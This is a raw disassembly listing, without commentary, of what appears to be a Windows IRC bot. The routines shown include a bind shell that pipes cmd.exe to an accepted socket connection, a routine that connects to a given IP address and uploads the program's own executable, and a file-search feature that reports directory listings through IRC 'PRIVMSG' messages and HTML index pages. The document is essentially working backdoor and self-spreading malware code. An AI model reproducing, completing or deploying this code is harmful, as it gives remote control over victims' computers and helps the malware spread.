loc_4112A6: ; CODE XREF: seg000:0041128E�j
lea eax, [ebp-2C48h]
push eax
call sub_4206A3
mov ecx, [ebp-4]
inc eax
mov [ecx+ebx+8], eax
mov [ecx+ebx], eax
mov [ecx+ebx+4], esi
add ecx, 0Ch
lea eax, [ebp-2C48h]
mov [ebp-4], ecx
push eax
add ecx, ebx
push ecx
call sub_41F862
lea eax, [ebp-2C48h]
push eax
call sub_4206A3
mov ecx, [ebp-4]
lea eax, [ecx+eax*2+2]
add esp, 10h
test al, 3
mov [ebp-4], eax
jz short loc_4112FB
loc_4112F3: ; CODE XREF: seg000:004112F6�j
inc eax
test al, 3
jnz short loc_4112F3
mov [ebp-4], eax
loc_4112FB: ; CODE XREF: seg000:004112F1�j
push 8
add eax, ebx
push esi
push eax
call sub_41E5F0
mov eax, [ebp-4]
add esp, 0Ch
add eax, 8
cmp ds:byte_441414[edi], 0
jz short loc_41131D
mov [eax+ebx], esi
jmp short loc_411323
; ---------------------------------------------------------------------------
loc_41131D: ; CODE XREF: seg000:00411316�j
mov word ptr [eax+ebx], 1
loc_411323: ; CODE XREF: seg000:0041131B�j
push 18h
lea eax, [ebp-24h]
push esi
push eax
call sub_41E5F0
add esp, 0Ch
xor ecx, ecx
xor eax, eax
inc eax
cmp ds:byte_441414[edi], cl
push eax
push 10B8h
push dword ptr [ebp-0Ch]
setnz cl
push ebx
sub esp, 18h
push 6
mov [ebp-1Ah], si
mov [ebp-10h], si
mov byte ptr [ebp-24h], 5
lea ecx, [ecx+ecx+19h]
mov [ebp-0Eh], cx
pop ecx
mov edi, esp
push dword ptr [ebp-8]
mov byte ptr [ebp-23h], 0
mov byte ptr [ebp-22h], 0
mov byte ptr [ebp-21h], 3
mov dword ptr [ebp-20h], 10h
mov [ebp-18h], eax
lea esi, [ebp-24h]
rep movsd
call sub_410E59
add esp, 2Ch
xor edi, edi
test al, al
jz short loc_411393
inc edi
loc_411393: ; CODE XREF: seg000:00411390�j
push dword ptr [ebp-8]
call ds:dword_42B004 ; CloseHandle
push ebx
call sub_41E2A1
pop ecx
xor esi, esi
loc_4113A5: ; CODE XREF: seg000:00411128�j
push esi
push esi
push dword ptr [ebp-7Ch]
call ds:dword_4440D8
mov eax, edi
loc_4113B2: ; CODE XREF: seg000:00410F5D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
aVwb db 'VWì¼',0
db 2 dup(0), 6Ah
dd 0FC8B592Fh, 0C824B48Dh, 6A000000h, 0E8A5F301h, 0FFFFFB63h
dd 592F6A59h, 0B48DFC8Bh, 0C824h, 0F3016A00h, 0FB4DE8A5h
dd 0C481FFFFh, 0C0h, 1F468h, 1415FF00h, 680042B0h, 7C7h
dd 0BCEC81h, 2F6A0000h, 24B48D59h, 0CCh, 0A5F3FC8Bh, 9D0FE8h
dd 0C0C48100h, 3C000000h, 8B177501h, 0B42484h, 0E0C10000h
dd 88808D06h, 0FF0043D8h, 40C03300h, 0C03302EBh, 56C35E5Fh
dd 0BCEC8157h, 6A000000h, 0FC8B592Fh, 0C824B48Dh, 6A000000h
dd 0E8A5F300h, 0FFFFFADBh, 592F6A59h, 0B48DFC8Bh, 0C824h
dd 0F3006A00h, 0FAC5E8A5h, 0C481FFFFh, 0C0h, 1F468h, 1415FF00h
dd 680042B0h, 7C7h, 0BCEC81h, 2F6A0000h, 24B48D59h, 0CCh
dd 0A5F3FC8Bh, 9C87E8h, 0C0C48100h, 3C000000h, 8B177501h
dd 0B42484h, 0E0C10000h, 88808D06h, 0FF0043D8h, 40C03300h
dd 0C03302EBh
db 5Fh, 5Eh, 0C3h
; ---------------------------------------------------------------------------
loc_4114C7: ; DATA XREF: seg000:004116AD�o
push ebp
mov ebp, esp
sub esp, 404h
loc_4114D0: ; CODE XREF: seg000:004114EC�j
; seg000:00411508�j
push 0
push 400h
lea eax, [ebp-404h]
push eax
push ds:dword_4D5250
call ds:dword_444064 ; recv
test eax, eax
jle short loc_4114D0
push 0
lea ecx, [ebp-4]
push ecx
push eax
lea eax, [ebp-404h]
push eax
push ds:dword_4D5248
call ds:dword_42B084 ; WriteFile
jmp short loc_4114D0
; ---------------------------------------------------------------------------
loc_41150A: ; DATA XREF: seg000:00411694�o
push ebp
mov ebp, esp
sub esp, 404h
loc_411513: ; CODE XREF: seg000:00411539�j
; seg000:00411553�j
and dword ptr [ebp-4], 0
push 0
lea eax, [ebp-4]
push eax
push 400h
lea eax, [ebp-404h]
push eax
push ds:dword_4D524C
call ds:dword_42B080 ; ReadFile
cmp dword ptr [ebp-4], 0
jle short loc_411513
push 0
push dword ptr [ebp-4]
lea eax, [ebp-404h]
push eax
push ds:dword_4D5250
call ds:dword_4441A0 ; send
jmp short loc_411513
; ---------------------------------------------------------------------------
loc_411555: ; DATA XREF: sub_40274D+2AF2�o
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+8]
push ebx
push esi
push edi
push 28h
pop ecx
mov esi, eax
lea edi, [ebp-11Ch]
rep movsd
xor esi, esi
inc esi
push 10h
mov [eax+98h], esi
xor edi, edi
lea eax, [ebp-38h]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
push dword ptr [ebp-98h]
mov word ptr [ebp-38h], 2
call ds:dword_444260 ; htons
push 6
push esi
push 2
mov [ebp-36h], ax
call ds:dword_444100 ; socket
mov [ebp+8], eax
push 10h
lea eax, [ebp-38h]
push eax
push dword ptr [ebp+8]
call ds:dword_4441E4 ; bind
push 5
push dword ptr [ebp+8]
call ds:dword_444230 ; listen
mov ebx, ds:dword_42B0A0
mov esi, ds:dword_42B004
loc_4115D5: ; CODE XREF: seg000:0041171D�j
push edi
push edi
push dword ptr [ebp+8]
call ds:dword_4440BC ; accept
push edi
mov ds:dword_4D5250, eax
lea eax, [ebp-0Ch]
push eax
push offset dword_4D5248
push offset dword_4D5244
mov dword ptr [ebp-0Ch], 0Ch
mov dword ptr [ebp-4], 1
mov [ebp-8], edi
call ebx ; CreatePipe
push edi
lea eax, [ebp-0Ch]
push eax
push offset dword_4D5254
push offset dword_4D524C
call ebx ; CreatePipe
push 44h
lea eax, [ebp-7Ch]
push edi
push eax
call sub_41E5F0
mov eax, ds:dword_4D5244
add esp, 0Ch
push edi
mov [ebp-44h], eax
mov eax, ds:dword_4D5254
push 1
mov [ebp-40h], eax
push 2
lea eax, [ebp-3Ch]
push eax
mov dword ptr [ebp-7Ch], 44h
mov dword ptr [ebp-50h], 101h
mov [ebp-4Ch], di
call ds:dword_42B09C ; GetCurrentProcess
push eax
push ds:dword_4D5254
call ds:dword_42B09C ; GetCurrentProcess
push eax
call ds:dword_42B098 ; DuplicateHandle
lea eax, [ebp-28h]
push eax
lea eax, [ebp-7Ch]
push eax
push edi
push edi
push 4000090h
push 1
lea eax, [ebp-0Ch]
push eax
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_42B008 ; CreateProcessA
lea eax, [ebp-18h]
push eax
push edi
push edi
push offset loc_41150A
push edi
lea eax, [ebp-0Ch]
push eax
call ds:dword_42B03C ; CreateThread
mov [ebp-14h], eax
lea eax, [ebp-18h]
push eax
push edi
push edi
push offset loc_4114C7
push edi
lea eax, [ebp-0Ch]
push eax
call ds:dword_42B03C ; CreateThread
push 0FFFFFFFFh
push dword ptr [ebp-28h]
mov [ebp-10h], eax
call ds:dword_42B054 ; WaitForSingleObject
push edi
push dword ptr [ebp-10h]
call ds:dword_42B028 ; TerminateThread
push edi
push dword ptr [ebp-14h]
call ds:dword_42B028 ; TerminateThread
push dword ptr [ebp-10h]
call esi ; CloseHandle
push dword ptr [ebp-14h]
call esi ; CloseHandle
push edi
push dword ptr [ebp-28h]
call ds:dword_42B094 ; TerminateProcess
push ds:dword_4D5244
call esi ; CloseHandle
push ds:dword_4D5248
call esi ; CloseHandle
push ds:dword_4D524C
call esi ; CloseHandle
push ds:dword_4D5254
call esi ; CloseHandle
push dword ptr [ebp-24h]
call esi ; CloseHandle
push dword ptr [ebp-28h]
call esi ; CloseHandle
jmp loc_4115D5
; ---------------------------------------------------------------------------
word_411722 dw 8D55h ; DATA XREF: seg000:0040B9E2�o
dd 818C246Ch, 6C0ECh, 7C458B00h, 6A575653h, 0F08B5927h
dd 0F3B47D8Dh, 46F633A5h, 0B089106Ah, 98h, 458DDB33h, 0E8505360h
dd 0CE9Ch, 0FF0CC483h, 0C766C075h, 26045h, 426015FFh, 56530044h
dd 8966026Ah, 5D896245h, 15FF64h, 8B004441h, 0FFCE83F8h
dd 5675FE3Bh, 41C415FFh, 8D500044h, 0FFFDB485h, 3EDC68FFh
dd 0E8500043h, 0CF0Eh, 390CC483h, 1A75485Dh, 4475FF53h
dd 0FDB4858Dh, 8D50FFFFh, 0FF50C445h, 84E8B475h, 83FFFEFAh
dd 858D14C4h, 0FFFFFDB4h, 65AAE850h, 75FF0000h, 997BE8B8h
dd 5959FFFFh, 223E953h, 458B0000h, 34C069B8h, 89000002h
dd 4444F4B8h, 8D106A00h, 57506045h, 41E415FFh, 0C63B0044h
dd 400BBh, 0E8850F00h, 0FF000000h, 4441C415h, 27403D00h
dd 52740000h, 0B4858D50h, 68FFFFFDh, 433EA0h, 0CE88E850h
dd 0F6330000h, 390CC483h, 1A754875h, 4475FF56h, 0FDB4858Dh
dd 8D50FFFFh, 0FF50C445h, 0FCE8B475h, 83FFFEF9h, 858D14C4h
dd 0FFFFFDB4h, 6522E850h, 75FF0000h, 98F3E8B8h, 5959FFFFh
dd 19BE956h, 0FE680000h, 530000FFh, 9ABCE8h, 0A3595900h
dd 4D525Ch, 62458966h, 458D106Ah, 0FF575060h, 4441E415h
dd 75C63B00h, 0C415FF62h, 8B004441h, 858D56F0h, 0FFFFFDB4h
dd 433EA068h, 7E85000h, 330000CEh, 0CC483FFh, 75487D39h
dd 40FE8122h, 74000027h, 75FF571Ah, 0B4858D44h, 50FFFFFDh
dd 50C4458Dh, 0E8B475FFh, 0FFFEF973h, 8D14C483h, 0FFFDB485h
dd 99E850FFh, 0FF000064h, 6AE8B875h, 59FFFF98h, 12E95759h
dd 6A000001h, 15FF5705h, 444230h, 840FC63Bh, 0EFh, 107045C7h
dd 0BE000000h, 43C10Ch, 5070458Dh, 5050458Dh, 0BC15FF57h
dd 83004440h, 4589FFF8h, 0FE9747Ch, 505245B7h, 0FF5475FFh
dd 44418815h, 858D5000h, 0FFFFFDB4h, 433E6868h, 6BE85000h
dd 830000CDh, 7D8310C4h, 1B750048h, 75FF006Ah, 0B4858D44h
dd 50FFFFFDh, 50C4458Dh, 0E8B475FFh, 0FFFEF8DFh, 8D14C483h
dd 0FFFDB485h, 5E850FFh, 59000064h, 68006Ah, 8D000002h
dd 0FFFDB485h, 75FF50FFh, 6415FF7Ch, 83004440h, 840FFFF8h
dd 0FFFFFF78h, 35FF5656h, 4D1FE4h, 0E8B475FFh, 0FFFF0A2Dh
dd 0F8685059h, 8D00433Dh, 0FFF9B485h, 0E85053FFh, 0CD4Eh
dd 8D1CC483h, 0FFF9B485h, 50006AFFh, 0C7FFE8h, 8D505900h
dd 0FFF9B485h, 75FF50FFh, 0A015FF7Ch, 83004441h, 840FFFF8h
dd 0FFFFFF28h, 525805FFh, 1DE9004Dh, 57FFFFFFh, 421815FFh
dd 75FF0044h, 9753E8B8h, 6A59FFFFh, 6815FF00h, 0CC0042B0h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp-1A0h]
push eax
push 101h
call ds:dword_42B204 ; WSAStartup
push 0
push 1
push 2
call ds:dword_42B20C ; socket
push dword ptr [ebp+8]
mov ds:dword_4D5260, eax
mov word ptr [ebp-10h], 2
call ds:dword_42B218 ; inet_addr
push dword ptr [ebp+0Ch]
mov [ebp-0Ch], eax
call ds:dword_42B200 ; htons
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push ds:dword_4D5260
call ds:dword_42B1F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_411A78
push ds:dword_4D5260
call ds:dword_42B1F8 ; closesocket
call ds:dword_42B1FC ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_411A78: ; CODE XREF: seg000:00411A60�j
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp-104h]
push eax
push 0
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp-104h]
push offset byte_42B630
push eax
call sub_41E54E
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_411B14
test byte ptr [esi+0Ch], 10h
jnz short loc_411AF8
push edi
mov edi, 400h
loc_411AC0: ; CODE XREF: seg000:00411AF5�j
push esi
push 1
lea eax, [ebp-504h]
push edi
push eax
call sub_41E2D9
add esp, 10h
push 0
push edi
lea eax, [ebp-504h]
push eax
push ds:dword_4D5260
call ds:dword_42B210 ; send
push 1
call ds:dword_42B014 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_411AC0
pop edi
loc_411AF8: ; CODE XREF: seg000:00411AB8�j
push esi
call sub_41E24B
pop ecx
push ds:dword_4D5260
call ds:dword_42B1F8 ; closesocket
call ds:dword_42B1FC ; WSACleanup
xor eax, eax
inc eax
loc_411B14: ; CODE XREF: seg000:00411AB2�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
aUnlMbP db 'Ul$Œìp',0Ah,0 ; DATA XREF: seg000:0040B8BB�o
align 2
dw 458Bh
dd 5756537Ch, 0DB33F08Bh, 0A9B943h, 0BD8D0000h, 0FFFFF994h
dd 9889A5F3h, 2A0h, 0F604858Dh, 3350FFFFh, 10168F6h, 5D890000h
dd 485D8958h, 89505D89h, 0FFFE48B5h, 38B589FFh, 0FFFFFFFCh
dd 42B20415h, 6A535600h, 0C15FF02h, 8B0042B2h, 42B1E035h
dd 8D046A00h, 6A51584Dh, 0FFFFBF04h, 50570000h, 0FF6C4589h
dd 8D046AD6h, 6A504845h, 7D8B57FBh, 0D6FF576Ch, 5050458Dh
dd 4667E68h, 15FF5780h, 42B1E4h, 2C6583h, 0A166C033h, 4D1FE4h
dd 2845C766h, 0FF500002h, 44426015h, 45896600h, 8D106A2Ah
dd 57502845h, 0B1E815FFh, 0C0850042h, 54B8C0Fh, 0A6A0000h
dd 0EC15FF57h, 6A0042B1h, 0C0335941h, 8D505050h, 0FFFC3885h
dd 458B50FFh, 4CBD896Ch, 89FFFFFEh, 8D40707Dh, 0FFFE48B5h
dd 38BD8DFFh, 89FFFFFCh, 0FFFE489Dh, 0A5F350FFh, 0B21C15FFh
dd 0F8830042h, 2840FFFh, 8B000005h, 42B2101Dh, 39FF3300h
dd 7D89707Dh, 0BA8C0F7Ch, 6A000004h, 0D4858D64h, 6AFFFFFDh
dd 0A5E85000h, 6A0000C9h, 8DF63364h, 5056C445h, 0C997E8h
dd 18C48300h, 0FC38858Dh, 5750FFFFh, 17C6DE8h, 0FC08500h
dd 47784h, 6C7D3B00h, 458D6C75h, 858D5064h, 0FFFFFE38h
dd 6C75FF50h, 106445C7h, 0FF000000h, 42B1F015h, 0FFF88300h
dd 44E840Fh, 958B0000h, 0FFFFFE48h, 0D63BC933h, 84390E76h
dd 0FFFE4C8Dh, 410574FFh, 0F272CA3Bh, 1275CA3Bh, 7340FA83h
dd 8D84890Dh, 0FFFFFE4Ch, 0FE4885FFh, 453BFFFFh, 89037E70h
dd 6A567045h, 41746815h, 0FF500043h, 406E9D3h, 6A560000h
dd 0D4858D64h, 50FFFFFDh, 815FF57h, 850042B2h, 8B487FC0h
dd 0FFFE488Dh, 3BC033FFh, 393076CEh, 0FE4C85BCh, 1C74FFFFh
dd 72C13B40h, 8B20EBF2h, 0FE50858Ch, 8C89FFFFh, 0FFFE4C85h
dd 488D8BFFh, 40FFFFFEh, 72C13B49h, 488DFFE6h, 57FFFFFEh
dd 0B1F815FFh, 0A9E90042h, 8D000003h, 0FFFD3C85h, 458D50FFh
dd 858D50C4h, 0FFFFFDD4h, 43416C68h, 0E2E85000h, 8D0000D9h
dd 6468C445h, 50004341h, 0CC27E8h, 18C48300h, 0D75C085h
dd 68166A56h, 43414Ch, 356E9h, 0C4458D00h, 43414468h, 5E85000h
dd 850000CCh, 755959C0h, 146A560Dh, 43412C68h, 335E900h
dd 458D0000h, 412468C4h, 0E8500043h, 0CBE4h, 5959C085h
dd 6A560D75h, 4114680Dh, 14E90043h, 8D000003h, 0C68C445h
dd 50004341h, 0CBC3E8h, 59C08500h, 560D7559h, 0F868106Ah
dd 0E9004340h, 2F3h, 68C4458Dh, 4340F4h, 0CBA2E850h, 0C0850000h
dd 0D755959h, 681E6A56h, 4340D4h, 2D2E9h, 0C4458D00h, 4340CC68h
dd 81E85000h, 850000CBh, 755959C0h, 3C858D24h, 68FFFFFDh
dd 4340C8h, 0CB6AE850h, 0C0850000h, 0D755959h, 68136A56h
dd 4340B4h, 29AE9h, 0C4458D00h, 4340CC68h, 49E85000h, 850000CBh
dd 755959C0h, 3C858D24h, 68FFFFFDh, 4340B0h, 0CB32E850h
dd 0C0850000h, 0D755959h, 68136A56h, 43409Ch, 262E9h, 0C4458D00h
dd 43409468h, 11E85000h, 850000CBh, 755959C0h, 590A6A37h
dd 434068BEh, 4CBD8D00h, 0F3FFFFFFh, 858D50A5h, 0FFFFFF4Ch
dd 0E8A56650h, 0C31Ch, 858D5059h, 0FFFFFF4Ch, 7C75FF50h
dd 7D8BD3FFh, 0E9F6337Ch, 21Ah, 68C4458Dh, 434060h, 0CAC6E850h
dd 0C0850000h, 21755959h, 0BE59056Ah, 434048h, 0F3AC7D8Dh
dd 50A566A5h, 50AC458Dh, 0C2D6E8A4h, 50590000h, 0EBAC458Dh
dd 0C4458DBBh, 43404068h, 91E85000h, 850000CAh, 0F5959C0h
dd 0B685h, 0A0858D00h, 50FFFFFDh, 0FF78858Dh, 8D50FFFFh
dd 8D506045h, 8D505C45h, 8D505445h, 8D504C45h, 0FFFDD485h
dd 401868FFh, 0E8500043h, 0D805h, 0FF78858Dh, 0E850FFFFh
dd 0C869h, 8D684589h, 0FFFDA085h, 5AE850FFh, 6A0000C8h
dd 7C458932h, 0FF78858Dh, 5056FFFFh, 0C68BE8h, 7C75FF00h
dd 0FF78858Dh, 75FFFFFFh, 40106868h, 0E8500043h, 0C72Ah
dd 6A44C483h, 78858D10h, 56FFFFFFh, 0CCD3E850h, 45890000h
dd 60458D68h, 5C458D50h, 54458D50h, 4C458D50h, 38458D50h
dd 43400468h, 0F7E85000h, 830000C6h, 6A5624C4h, 3FE4681Dh
dd 14E90043h, 8D000001h, 0DC68C445h, 5000433Fh, 0C9C3E8h
dd 59C08500h, 0E0850F59h, 56000000h, 0B068286Ah, 5700433Fh
dd 75FFD3FFh, 38458D68h, 0FA12E850h, 0F883FFFFh, 0F595901h
dd 0B485h, 38458D00h, 94858D50h, 68FFFFF7h, 433F8Ch, 0C698E850h
dd 0C4830000h, 30B5390Ch, 75FFFFFCh, 0B5FF5623h, 0FFFFFC2Ch
dd 0F794858Dh, 8D50FFFFh, 0FFFBAC85h, 0B5FF50FFh, 0FFFFF994h
dd 0FEF202E8h, 14C483FFh, 0FFFA3CE8h, 1F883FFh, 8C850Fh
dd 6A560000h, 3F746817h, 0FF570043h, 38458DD3h, 94858D50h
dd 68FFFFF7h, 433F58h, 0C63CE850h, 0C4830000h, 30B5390Ch
dd 75FFFFFCh, 0B5FF5623h, 0FFFFFC2Ch, 0F794858Dh, 8D50FFFFh
dd 0FFFBAC85h, 0B5FF50FFh, 0FFFFF994h, 0FEF1A6E8h, 14C483FFh
dd 0F794858Dh, 0E850FFFFh, 5CCCh, 400C05FFh, 0EB59004Dh
dd 206A5629h, 433F3468h, 8D1CEB00h, 4068C445h, 500042FCh
dd 0C8CBE8h, 59C08500h, 560B7559h, 18681B6Ah, 5700433Fh
dd 646AD3FFh, 0FDD4858Dh, 5056FFFFh, 0C50BE8h, 0CC48300h
dd 707D3B47h, 0F7C7D89h, 0FFFB468Eh, 59416AFFh, 5050C033h
dd 38858D50h, 50FFFFFCh, 4070458Bh, 0FE48B58Dh, 0BD8DFFFFh
dd 0FFFFFC38h, 0FFA5F350h, 42B21C15h, 0FFF88300h, 0FB07850Fh
dd 0DB33FFFFh, 8B5E5F43h, 0C5835BC3h, 4C2C974h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412135 proc near ; CODE XREF: sub_40274D+73A7�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_598]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_41E5F0
mov edi, [ebp+arg_0]
push offset asc_42CC64 ; "\n"
push edi
call sub_41E7B2
add esp, 14h
cmp [ebp+arg_8], ebx
push edi
jz short loc_412194
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 14h
jmp loc_412290
; ---------------------------------------------------------------------------
loc_412194: ; CODE XREF: sub_412135+3B�j
cmp [ebp+arg_C], ebx
jz loc_412276
call sub_41E1C0
push edi
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov [eax+edi-1], bl
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 14h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 10h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
push edi
call sub_41E1C0
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 1Ch
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 0Ch
jmp short loc_412290
; ---------------------------------------------------------------------------
loc_412276: ; CODE XREF: sub_412135+62�j
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 10h
loc_412290: ; CODE XREF: sub_412135+5A�j
; sub_412135+13F�j
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
cmp [ebp+arg_C], ebx
jz short loc_412328
push [ebp+arg_C]
call sub_41E1C0
cmp eax, 2
pop ecx
jbe short loc_412328
push [ebp+arg_C]
call sub_41E1C0
sub eax, 3
pop ecx
jz short loc_4122DC
loc_4122D0: ; CODE XREF: sub_412135+1A5�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4122DC
dec eax
jnz short loc_4122D0
loc_4122DC: ; CODE XREF: sub_412135+199�j
; sub_412135+1A2�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_41E860
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 1Ch
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
loc_412328: ; CODE XREF: sub_412135+17D�j
; sub_412135+18B�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_42B0B4 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jz loc_41271F
mov edi, 1FFh
loc_412354: ; CODE XREF: sub_412135+5E4�j
cmp [ebp+var_38C], ebx
jz loc_412707
lea eax, [ebp+var_360]
push offset a__ ; ".."
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_412707
lea eax, [ebp+var_360]
push offset a__0 ; "."
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_412707
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_42B0AC ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_42B0A8 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm_0 ; "PM"
ja loc_412451
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_4123D0: ; CODE XREF: sub_412135+322�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_41E6A6
add esp, 20h
test byte ptr [ebp+var_38C], 10h
jz loc_412588
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_41245C
lea eax, [ebp+var_360]
push eax
push offset aS_2 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_41E6FE
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_41E6FE
add esp, 28h
jmp loc_4126D8
; ---------------------------------------------------------------------------
loc_412451: ; CODE XREF: sub_412135+28D�j
movzx eax, ax
sub eax, 0Ch
jmp loc_4123D0
; ---------------------------------------------------------------------------
loc_41245C: ; CODE XREF: sub_412135+2D5�j
cmp [ebp+arg_C], ebx
jz loc_412546
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push edi
push eax
call sub_41E6FE
add esp, 10h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_3 ; "%s%s/"
push edi
push eax
call sub_41E6FE
add esp, 14h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
lea eax, [ebp+var_360]
push eax
call sub_41E1C0
cmp eax, 1Eh
lea eax, [ebp+var_360]
pop ecx
push eax
lea eax, [ebp+var_24C]
jbe short loc_412502
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_412507
; ---------------------------------------------------------------------------
loc_412502: ; CODE XREF: sub_412135+3C4�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_412507: ; CODE XREF: sub_412135+3CB�j
push edi
push eax
call sub_41E6FE
add esp, 10h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4126C9
; ---------------------------------------------------------------------------
loc_412546: ; CODE XREF: sub_412135+32A�j
lea eax, [ebp+var_360]
push eax
push offset aS_2 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_41E6FE
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_412573: ; CODE XREF: sub_412135+47B�j
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41E6FE
add esp, 24h
jmp loc_4126D8
; ---------------------------------------------------------------------------
loc_412588: ; CODE XREF: sub_412135+2C9�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4125B2
push ebx
push [ebp+var_36C]
call sub_419443
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
